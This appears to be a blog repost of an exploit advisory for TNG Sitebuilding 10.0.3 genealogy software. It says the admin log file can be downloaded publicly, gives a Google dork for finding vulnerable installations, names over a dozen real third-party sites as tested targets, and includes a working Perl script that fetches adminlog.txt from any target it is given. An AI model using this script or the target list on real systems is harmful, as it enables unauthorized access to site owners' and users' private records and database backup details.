TNG Sitebuilding v. 10.0.3 - Admin Panel Motion Logs Downloader Exploit
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact(onlymail) : knockout@e-mail.com.tr
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com
############################################################
Turkey Security Group
'h4x0re SECURITY'
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : The Next Generation of Genealogy Sitebuilding
|~Affected Version : 10.0.3 and All Version
|~Official Web: http://www.tngsitebuilding.com
|~Official Demo: http://lythgoes.net/genealogy/demo10/
|~RISK : Medium
|~Google Keyword/Dork : intext: "The Next Generation of Genealogy Sitebuilding"
|~Tested On : Kali Linux \ Windows XP
#########################################################
####################ABOUT#############################
Admin adminlog.txt all his movements are recorded file.
This log file is displayed in the target's local directory
Database backup taken in this file where records are shown to be
and you can easily download a database backup
########################################################
Example affected sites.
( http://www.tngsitebuilding.com/usersites.php )
Tested on:
http://www.safamilytree.com/TNG/
http://vanzeggeren.nl/familytree/
http://www.nordseth.nl/sieinofam/
http://lythgoes.net/genealogy/
http://myrootsplace.com/
http://lythgoes.net/genealogy/demo10/
http://www.eastcarolinaroots.com/trees/
https://histfam.familysearch.org/
http://www.earlylds.com/
http://www.jrpoot.eu/tng/
http://www.robisonandblythe.org/
http://www.moore.org.nz/genealogy/
http://www.thenavarres.com/genealogy/
... etc
... etc
==============================================================================00
'adminlog.txt' file Downloader EXPLOIT; remote.pl
==============================================================================00
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title TNG Sitebuilding v. 10.0.3 - Admin Panel Motion Logs Downloader Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-] Example \n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 TARGET /path/ \n";
print "[+] usage2 : perl $0 TARGET / \n";
}
print "\n************************************************************************\n";
print "\* TNG Sitebuilding v. 10.0.3 - Admin Panel Motion Logs Downloader Exploit *\n";
print "\* Exploited By : KnocKout *\n";
print "\* Contact : knockoutr[at]msn[dot]com *\n";
print "\* -- *\n";
print "\*********************************************************************\n\n\n";
($TargetIP, $path, $File,) = @ARGV;
$File="adminlog.txt";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait.. \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "adminlog.txt");
if ($request->is_success)
{
print "[+] $url <= Exploit Basarili!\n\n";
print "[+] OPERASYON TAMAM!\n";
print "[+] adminlog.txt Dosyasi Indirildi \n";
print "[+] goodluck.
\n";
exit();
}
else
{
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
exit();
}
Hiç yorum yok:
Yorum Gönder